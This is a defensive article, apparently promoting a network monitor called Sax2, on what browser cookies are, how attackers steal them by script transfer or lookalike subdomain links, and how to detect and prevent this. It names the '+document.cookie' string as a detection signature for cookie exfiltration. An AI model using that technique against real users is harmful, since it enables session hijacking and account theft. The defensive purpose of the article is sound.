How to Detect and Prevent Cookie Stealing

 

What is cookie?


A cookie (also tracking cookie, browser cookie, and HTTP cookie) is a small piece of text stored on a user's computer by a web browser. A cookie consists of one or more name-value pairs containing bits of information.
The cookie could be used for authentication, session tracking (state maintenance), storing site preferences, shopping cart contents, the identifier for a server-based session, or anything else that can be accomplished through storing textual data.


Cookie Stealing and the damage


Cookie Stealing means the attackers gain the cookie of a user without authorization. The following sensitive message will be disclosure when cookie was stealed because the records of the visited website were saved in Cookie.
    Information of visited website
    Information of server background
    Information of BBS user
    Information of website administrator
    Information of Game user
    Information of online bank account
         ……
 


The method of Cookie Stealing


There are two methods to transfer cookie, at present, script automatically transfer and email. According to incomplete statistics, more than 90 percent of cookie stealing is transmitted via script automatically transfer which will transfer the cookie to the indicated position. The “+document.cookie” is included in the code when transmitted via script automatically transfer.


How to Detect Cookie Stealing with Sax2


1) Run Sax2 and start detection.
2) Sax2 will detect the event of HTTP_Suspected cookie stealing if there is cookie stealing action in network. See figure 1.

(Figure 1 Sax2 real-time alarm when encountered Cookie Stealing)

From the above figure, Sax2 detect there is host (IP: 192.168.1.100) transferring its cookie information to the internet address 61.xx.xxx.3. In the “Original Communication” tab, the code “+document.cookie” included in the original message.


How to Prevent Cookie Stealing


1. The easiest way to prevent someone from stealing your cookies is to watch the links you click. Check the URL address of the website it is trying to take you to. If you don't know it, don't trust it. A good thing to look for is the structure of the URL. The cookie stealing scenarios will be run from a free sub domain. To hide the link they will try to make it look like the web address of the site that they are putting the malicious link on. So say you came across a cookie stealer on Myspace. They will most likely form a sub domain that looks something like this. Www.myspace.freehost.com. At a glance you will just see the Myspace and think everything's good. It is very important that you watch for things like this.

2. The only real method that you need to follow other than the one above is too clear your cookies after every session. If a Trojan at any point somehow infects you then you most likely have some kind of backdoor on your computer that you don't even understand. This is a free pass for hackers to welcome themselves in. All they need to do once there in copy all the files in your cookie folder to their computer and start cracking. Nevertheless, if you make it a habit to delete these cookies at the close of every session then there is nothing for the hacker to steal (as far as cookies go, that is).